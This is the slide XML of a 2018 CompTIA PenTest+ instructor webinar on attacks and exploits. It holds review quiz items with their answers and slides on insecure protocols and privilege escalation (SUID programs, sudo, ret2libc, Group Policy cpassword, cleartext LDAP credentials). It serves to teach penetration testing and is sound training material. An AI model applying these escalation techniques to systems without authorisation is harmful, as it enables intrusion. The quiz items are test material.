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66"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId67"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="296" r:id="rId5"/>
    <p:sldId id="675" r:id="rId6"/>
    <p:sldId id="477" r:id="rId7"/>
    <p:sldId id="299" r:id="rId8"/>
    <p:sldId id="305" r:id="rId9"/>
    <p:sldId id="676" r:id="rId10"/>
    <p:sldId id="677" r:id="rId11"/>
    <p:sldId id="679" r:id="rId12"/>
    <p:sldId id="689" r:id="rId13"/>
    <p:sldId id="712" r:id="rId14"/>
    <p:sldId id="713" r:id="rId15"/>
    <p:sldId id="706" r:id="rId16"/>
    <p:sldId id="707" r:id="rId17"/>
    <p:sldId id="702" r:id="rId18"/>
    <p:sldId id="703" r:id="rId19"/>
    <p:sldId id="680" r:id="rId20"/>
    <p:sldId id="681" r:id="rId21"/>
    <p:sldId id="694" r:id="rId22"/>
    <p:sldId id="714" r:id="rId23"/>
    <p:sldId id="696" r:id="rId24"/>
    <p:sldId id="697" r:id="rId25"/>
    <p:sldId id="700" r:id="rId26"/>
    <p:sldId id="701" r:id="rId27"/>
    <p:sldId id="704" r:id="rId28"/>
    <p:sldId id="705" r:id="rId29"/>
    <p:sldId id="710" r:id="rId30"/>
    <p:sldId id="711" r:id="rId31"/>
    <p:sldId id="715" r:id="rId32"/>
    <p:sldId id="716" r:id="rId33"/>
    <p:sldId id="682" r:id="rId34"/>
    <p:sldId id="720" r:id="rId35"/>
    <p:sldId id="721" r:id="rId36"/>
    <p:sldId id="722" r:id="rId37"/>
    <p:sldId id="723" r:id="rId38"/>
    <p:sldId id="737" r:id="rId39"/>
    <p:sldId id="724" r:id="rId40"/>
    <p:sldId id="738" r:id="rId41"/>
    <p:sldId id="725" r:id="rId42"/>
    <p:sldId id="726" r:id="rId43"/>
    <p:sldId id="683" r:id="rId44"/>
    <p:sldId id="684" r:id="rId45"/>
    <p:sldId id="739" r:id="rId46"/>
    <p:sldId id="740" r:id="rId47"/>
    <p:sldId id="687" r:id="rId48"/>
    <p:sldId id="719" r:id="rId49"/>
    <p:sldId id="727" r:id="rId50"/>
    <p:sldId id="717" r:id="rId51"/>
    <p:sldId id="728" r:id="rId52"/>
    <p:sldId id="688" r:id="rId53"/>
    <p:sldId id="718" r:id="rId54"/>
    <p:sldId id="729" r:id="rId55"/>
    <p:sldId id="733" r:id="rId56"/>
    <p:sldId id="734" r:id="rId57"/>
    <p:sldId id="735" r:id="rId58"/>
    <p:sldId id="736" r:id="rId59"/>
    <p:sldId id="730" r:id="rId60"/>
    <p:sldId id="731" r:id="rId61"/>
    <p:sldId id="732" r:id="rId62"/>
    <p:sldId id="685" r:id="rId63"/>
    <p:sldId id="686" r:id="rId64"/>
    <p:sldId id="678" r:id="rId6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="" xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main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8113" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="98" d="100"/>
          <a:sy n="98" d="100"/>
        </p:scale>
        <p:origin x="-408" y="-9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0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17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B6144-CBEE-4E0A-9D32-5228FF5F1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4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A45AEBA5-269E-4070-869B-74F2C8FCF8C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278589" y="140494"/>
            <a:ext cx="816422" cy="723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jstanger@comptia.org" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:lee@mcwhortertechnologie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tkasem@comptia.or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wMU4n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altLang="zh-CN" sz="2100" dirty="0" err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PenTest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="21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+ TTT Session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="21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7: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Attacks and Exploits III</a:t>
            </a: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sz="1200" dirty="0" smtClean="0"/>
              <a:t>06/26/2018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TeachCompTIA</a:t>
            </a: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    #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PenTestPlusTTT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" y="809308"/>
            <a:ext cx="4136335" cy="1799306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3AEA45DC-1BF5-484F-B64D-614193D3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71" y="2204473"/>
            <a:ext cx="2300879" cy="1912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False </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Negative </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>is when a test fails to indicate a condition or attribute is present when it is, such as a port being open but not shown as open.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</a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="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False </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Negative </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>is when a test fails to indicate a condition or attribute is present when it is, such as a port being open but not shown as open. True or False</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?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True</a:t>
            </a:r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False</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pP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Stealth scan quietly sends a full set of TCP handshake packets to avoid detection.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</a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>False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Stealth scan quietly sends a full set of TCP handshake packets to avoid detection.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False</a:t>
            </a:r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Remember a Stealth scan sends just a SYN packet and looks at the response. If SYN/ACK is sent back, the port is open, if not it is closed. The scanner then sends an RST to any SYN/ACKs received to end the connection.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types of pen test assessments we have discussed?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Goal-based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Compliance-based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Red Team</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Objective-based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-3429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types of pen test assessments we have discussed?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Goal-based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Compliance-based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Red Team</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Objective-based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of the above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NOT a form of Social Engineering?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Spear Phishing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Whaling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Creating a USB drop stick</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Credential Harvesting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Impersonation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NOT a form of Social Engineering?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Spear Phishing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Whaling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Creating a USB drop stick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Credential Harvesting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Impersonation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SOAP stand for?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Standard Object Authentication Protocol </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Standard Object Access Protocol</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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Symmetric Object Access Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Simple Object Authentication Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Simple Object Access Protocol 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SOAP stand for?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Standard Object Authentication Protocol </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Standard Object Access Protocol</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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Symmetric Object Access Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Simple Object Authentication Protocol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Simple Object Access Protocol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Housekeeping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2506" y="1709136"/>
            <a:ext cx="733423" cy="505888"/>
            <a:chOff x="572648" y="1396987"/>
            <a:chExt cx="1303862" cy="899356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572648" y="1466726"/>
              <a:ext cx="1303862" cy="82961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940" y="1396987"/>
              <a:ext cx="927100" cy="8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82506" y="3423040"/>
            <a:ext cx="733423" cy="466660"/>
            <a:chOff x="572648" y="3479705"/>
            <a:chExt cx="1303862" cy="829617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572648" y="3479705"/>
              <a:ext cx="1303862" cy="829617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690" y="3518974"/>
              <a:ext cx="852034" cy="79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582506" y="2617790"/>
            <a:ext cx="733423" cy="474627"/>
            <a:chOff x="572648" y="2498532"/>
            <a:chExt cx="1303862" cy="843781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72648" y="2498532"/>
              <a:ext cx="1303862" cy="829617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940" y="2498532"/>
              <a:ext cx="909638" cy="84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448175" y="2531459"/>
            <a:ext cx="50224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Recording will be distributed within two hours. Slides and homework can be downloaded from the resource widget.  You are able to do this via the recording as well.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175" y="3404952"/>
            <a:ext cx="5022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</a:rPr>
              <a:t>Submit questions via the Q&amp;A. The questions will be answered as submitted throughout the sessions.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175" y="1709135"/>
            <a:ext cx="50224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Unmute your speakers.</a:t>
            </a:r>
          </a:p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Use Chrome if you have issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="503631" lvl="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Enable Flash: Chrome://settings/content flash settings enabled</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="134500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critically important during planning and scoping?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Understanding the target audience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Obtaining proper signed authority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Budget</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Both A and B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Both A and C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All of the above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critically important during planning and scoping?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Understanding the target audience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Obtaining proper signed authority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Budget</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Both A and B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Both A and C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All of the above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a legal contract which provides a framework for all future activities undertaken by the parties?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SOW</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MSA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NDA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All of the above play a part</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>None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a legal contract which provides a framework for all future activities undertaken by the parties?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SOW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MSA</a:t>
            </a:r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NDA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All of the above play a part</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>None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commonly referred to as the ‘Swiss Army Knife’ of network utilities?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ncat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nmap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nc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arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-scan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commonly referred to as the ‘Swiss Army Knife’ of network utilities?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ncat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nmap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nc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err="1" smtClean="0"/>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-scan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the -A command line option in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> do?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OS Detection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Version Detection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Script Scanning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Traceroute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the -A command line option in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> do?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OS Detection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Version Detection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Script Scanning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Traceroute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of the Above</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	Note: Older versions only performed OS and Version Detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pP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examples of Injection attack types? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Pick all that apply or All of the Above)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SQL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Code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File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HTML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Command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examples of Injection attack types? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Pick all that apply or All of the Above) – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Note:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> File is not technically on the Objectives…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SQL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Code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File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HTML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Command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C5F5B8A-E10E-4F71-B4F4-4670220CB6B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="260624" y="2004179"/>
            <a:ext cx="6672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Chat with the audience and instructor by clicking the Group Chat icon          and enter you questions or comments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Have a question? Click the Q&amp;A icon         and enter your questions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print your Certification of Attendance using the certification widget     ,  after attending at least 110 minutes of the session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Do you have an idea or resource? We are trying the Idea widget out. Share resources you are using by typing in the Idea widget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media player will show video, and when the instructor shares the screen, will show shared content.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="342892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Control of Your Console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1B8A7EE-2385-4AFA-8DB0-1650E2BAD9DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="260622" y="1195676"/>
            <a:ext cx="66724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the controls             to minimize or maximize a widget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Drag the bottom right hand corner to resize it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Click the icon          to download resources &amp; bookmark helpful links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93183EF-6073-422C-8C76-F72AABDCB6D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="260624" y="968691"/>
            <a:ext cx="2032929" cy="248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892">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1013" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Widgets are resizable and movable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812E6C8-8AAD-4601-B73D-976417DF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4" y="1242813"/>
            <a:ext cx="516518" cy="271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BE568B4-B5DA-4B4D-A22F-BA54A866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65" y="1488428"/>
            <a:ext cx="606818" cy="318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5B2664D-4063-488F-8FE0-2263C362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418" y="1753003"/>
            <a:ext cx="325502" cy="318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13E31AA-A632-4F13-9D93-36236577E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69" y="2315789"/>
            <a:ext cx="332185" cy="31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67DE16-24CF-4C19-BAA5-347A6F46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684" y="2551737"/>
            <a:ext cx="335803" cy="35009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D94C0E1-285A-4651-9349-FB7229E3B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03" y="3137852"/>
            <a:ext cx="328934" cy="328934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="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E96229A7-8DBA-498D-8B09-B0F509A6A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974" y="3630960"/>
            <a:ext cx="309388" cy="338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21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963852"/>
            <a:ext cx="882491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OS vulnerabilities</a:t>
            </a:r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smtClean="0"/>
              <a:t>https://www.cvedetails.com/vulnerability-list/vendor_id-26/product_id-32238/Microsoft-Windows-10.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mac OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https://www.cvedetails.com/vulnerability-list/vendor_id-49/product_id-155/Apple-Mac-Os.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Linux	 -  One can find most major flavors of Linux on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CVEDetails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</a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>www.cvedetails.com/vulnerability-list/vendor_id-1224/product_id-19997/Google-Android.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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   -   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 12 not even out yet and have already seen Jailbreak demos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Unsecure service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and protocol configurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Broadly any time a system is running a non-secure server/protocol such as TFTP (Trivial FTP), FTP, Telnet, etc. or is running a secure service/protocol but with an insecure configuration.  Some examples:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most services without encryption like above, plus unencrypted POP3 or IMAP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Secure services such as SSH downgraded to support older encryption protocols to support legacy devices.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Older protocols </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> newer such as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>WPA instead of WPA2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SNMP v1 instead of SNMP v3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Default configurations and/or users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Privilege escalation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Linux-specific</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SUID/SGID programs - indicated by a letter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in the permissions, programs with these permissions run as the user or group of the program respectively.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>-r-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" b="1" dirty="0" smtClean="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>r-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" b="1" dirty="0" smtClean="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>r-x 1 root sys 31396 Jan 20 2014 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>usr/bin/passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-x-x 1 root user 16384 Jan 12 2014 /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>su</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Unsecure SUDO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>- SUDO is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>a program for Unix-like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>operating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>systems that allows users to run programs with the security privileges of another user, by default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>root.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ret2libc - is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>an attack technique </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>that relies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>on overwriting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>stack to create a new stack frame that calls the system function.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sticky bits - primarily used for shared folders like /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>this allows users to create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>files, read and execute files owned by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>others</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>remove </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>files owned by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>others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Privilege </a:t>
            </a:r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Windows-specific</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cpassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> - is the name of the attribute that stores passwords in a Group Policy Preference item</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.  Store </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>in the SYSVOL folder on Domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Controllers in encrypted XML, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>but easily decrypted by any authenticated user in the domain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Clear </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>text credentials in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>LDAP (Lightweight Directory Access Protocol)</a:t>
            </a:r>
